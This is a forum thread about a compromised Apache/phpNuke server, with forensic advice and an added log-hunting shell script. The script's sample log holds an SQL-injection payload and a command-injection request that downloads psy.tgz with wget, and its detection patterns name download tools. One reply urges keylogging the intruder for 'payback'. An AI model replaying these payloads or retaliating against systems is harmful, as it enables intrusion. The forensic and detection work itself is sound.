Server compromised?
Hi all.
I'm very worried about the security of my company's server. We only have a web server and sshd running on it. It's a Mandrake 9.2 machine with apache2-2.0.47 on it. When looking at the syslog I started getting suspicious. I then did a netstat -anp, which made me even more worried. Here is how it looks:
Code:
tcp 0 1 192.16.4.2:57467 62.235.13.228:6667 SYN_SENT 13199/uptime
I've found out that all these programs that are trying to access IRC (is this correct?) are running under the apache user, which means that our web server has been hacked, or so I think. Luckily the firewall is blocking these outgoing messages. Also there was a program called "mech" running, doing exactly the same as the programs above, but I've now killed it, so it's no longer running. It is also interesting that this mech program was located in /var/tmp/PsY/. Well, I think it is quite obvious what my question is. Is there a vulnerability in my web server configuration, and how do I go about finding it? Any suggested reading that I should do? Also, I've been using Tripwire, so I'm going to go through its report to try to find out what has happened. Any advice would be greatly appreciated! Avatar |
Hi.
Yes, you've been cracked. Do a Google search for 'psy.tgz' for further info. Before you do that, though, get that server off the network; who knows what else it's being used for. Dave |
Thanks Dave for your reply.
I took the server off the Net. But I would really like to learn more about what happened, or else it will keep happening. I've taken a look at the syslog and it seems Shorewall started blocking these IRC requests on 23 March. So I've not been very observant :-( Surely there is some way to search the relevant logs for events that happened around that time? I just don't know which logs to check. I'm guessing that whoever hacked the server wanted to keep this server accessible for later on, so there must be something in the startup scripts (or similar) that I can use to find more info. I've also found out that apache now has port 4000 open (the door for the hacker, I'm guessing). How would I find out if the person has hacked only apache or has been able to hack root? I really want to use this bad experience as a way to learn more about security, so _any_ hints or additional info would really be appreciated. Thanks, Avatar |
I just had an idea.
How about you put a nice keylogger and another computer bridging the connection, so you can sniff it without the hacker noticing? Now you let the hacker play around on your server and he is bound to log into something or do some stuff. So you log his passwords :) and get to know his IP and, as he seems to like IRC, his nick and other info on him. You might even find out how he is getting in. You would hack the hacker. You can then do what you want, but I would say payback time :D |
First, let me say that a complete format and reinstall will be necessary when you're done doing forensics.
Probably good places to start looking would be the apache/httpd logs, for any abnormal error messages. Also look through the general system logs for anything suspicious. You should definitely download and run Rootkit Hunter and chkrootkit on the system, as there are a bunch of things listening as services that shouldn't be (like init, for example), which makes a rootkit likely. If that's the case, then you may need to use a CD-based distro like knoppix-std or FIRE to do any further analysis. You may have some luck looking those processes up by their process ID number in /proc/<PID>/cmdline. If you find anything interesting there (like a path to the binary), take a look at the contents and see what you can find. With regards to how you got cracked, what version of Apache were you running? Were you hosting any content other than static HTML pages, like CGI or PHP for example? File permissions for stuff in the server root? |
Thanks guys for your replyies.
I'm not in front of my server right now, so all the info I post now is from memory. I will make sure that I format and reinstall once I've finished my detective work. I have run chkrootkit and found an infected item (I will post more detail later, when I'm in front of my box) listening on port 4000. I've found the directory where the hacker downloaded/placed his tools; it's in /var/tmp if I'm not mistaken, and that directory is owned by the apache user. And yes, init was running and located in this directory. What is the relevance of init running?
Thanks very much for the links, I see I have much reading to do. Cheers, Avatar |
phpNuke is one of the most prone CMSes I've ever used/experienced. Convert to PostNuke or get another CMS to work with. What version is your phpNuke? |
I've read up on phpNuke too, and wanted to start a website using that program, but I was apprehensive about it.
To prevent something like this again, you might want to try the patched versions from Nuke fixes, which, among other things, filter out MySQL injection attacks. Also, check out mod_security for Apache. This prevents popular web attacks before they reach the script. I use the rules from http://www.gotroot.com/mod_security+rules |
Sorry for the delay.
We were using phpNuke 7.4. I'll take a look at mod_security. Thanks all for your help. Avatar |
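Added example, not part of the original thread, for the log-hunting question raised earlier (which logs to search and what to look for around the date the firewall started blocking): the same kind of pattern match mod_security does at request time, run after the fact over Apache's access_log in sh and awk, followed by the complete session of each client that tripped a pattern. The log lines are constructed (the year, the IPs and the query strings are assumptions, and the cmd= parameter is a made-up injection point for the sample, not a documented phpNuke bug); the patterns are generic SQL-injection and file-download markers, not a phpNuke 7.4 signature.

```shell
#!/bin/sh
# Added example, not from the original thread: find the request that brought
# the attacker in, then read that client's whole session top to bottom.

# Constructed sample in Apache common log format. Year, IPs and query strings
# are invented; "cmd=" is a made-up parameter, not a real phpNuke entry point.
SAMPLE_LOG='10.1.1.5 - - [22/Mar/2004:10:12:01 -0500] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 5123
203.0.113.44 - - [23/Mar/2004:02:40:09 -0500] "GET /index.php HTTP/1.0" 200 8120
203.0.113.44 - - [23/Mar/2004:02:41:17 -0500] "GET /modules.php?name=Search&query=%27%20UNION%20SELECT%20pwd%20FROM%20nuke_authors/* HTTP/1.0" 200 2911
203.0.113.44 - - [23/Mar/2004:02:43:02 -0500] "GET /modules.php?name=Downloads&cmd=cd%20/var/tmp;wget%20http://203.0.113.7/psy.tgz HTTP/1.0" 200 0
10.1.1.9 - - [23/Mar/2004:09:00:44 -0500] "GET /images/logo.gif HTTP/1.1" 304 -'

# awk program: URL-decode the request (so %27 becomes a quote and %20 a space,
# otherwise the patterns miss), lowercase it, then tag SQL-injection and
# command/download markers. Output: "tags<TAB>client<TAB>decoded request".
AWK_HUNT='
function hex2dec(h,  i, v) {
    v = 0
    for (i = 1; i <= length(h); i++)
        v = v * 16 + index("0123456789abcdef", substr(h, i, 1)) - 1
    return v
}
function urldecode(s,  out, c) {
    out = ""
    while (length(s) > 0) {
        c = substr(s, 1, 1)
        if (c == "%" && substr(s, 2, 2) ~ /^[0-9a-f][0-9a-f]$/) {
            out = out sprintf("%c", hex2dec(substr(s, 2, 2))); s = substr(s, 4)
        } else if (c == "+") { out = out " "; s = substr(s, 2) }
        else { out = out c; s = substr(s, 2) }
    }
    return out
}
BEGIN {
    sq   = "\047"
    sqli = "union[ /*+]*select|select[ /*+]+.*[ /*+]+from|char\\(|/\\*\\*/|" sq "[ ]*(or|and)[ ]*" sq "|" sq "[ ]*--"
    cmd  = "wget |curl |chmod |/var/tmp|/dev/shm|\\.tgz|\\.tar\\.gz|;[ ]*id[ ;]|\\|[ ]*sh "
}
{
    match($0, /"[^"]*"/)
    req = urldecode(tolower(substr($0, RSTART + 1, RLENGTH - 2)))
    tag = ""
    if (req ~ sqli) tag = tag "sqli "
    if (req ~ cmd)  tag = tag "cmd "
    if (tag != "") print tag "\t" $1 "\t" req
}'

# stdin: access_log lines; stdout: one tagged line per suspicious request
flag_requests() { awk "$AWK_HUNT"; }

# stdin: access_log lines; stdout: unique client IPs that sent a flagged request
attacker_ips() { flag_requests | cut -f2 | sort -u; }

# requests_from IP: every request that client made, in order, so the whole
# session (recon, injection, tool download) can be read as one story
requests_from() { awk -v ip="$1" '$1 == ip'; }

# Stand-alone run on the constructed sample. On the real box:
#   flag_requests < /var/log/httpd/access_log
# and narrow to the day the firewall first complained with grep '23/Mar'.
printf '%s\n' "$SAMPLE_LOG" | flag_requests
for ip in $(printf '%s\n' "$SAMPLE_LOG" | attacker_ips); do
    echo "--- full session from $ip"
    printf '%s\n' "$SAMPLE_LOG" | requests_from "$ip"
done
```

Two things to keep in mind when running this for real: a 200 with a 0-byte response on an odd query string is itself worth a look even when no pattern fires, and the first hit you find is rarely the first visit, so always pull the full history of the flagged IP rather than stopping at the request that matched.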
Howzit.
Check the /var/log/messages and /var/log/secure files as well. Cheers boot :D lekker blei |
Once you're done hacking the hacker, report as much as possible about him to the FBI. |
You might consider using chkrootkit as well, to detect any malicious software which might have been installed recently! |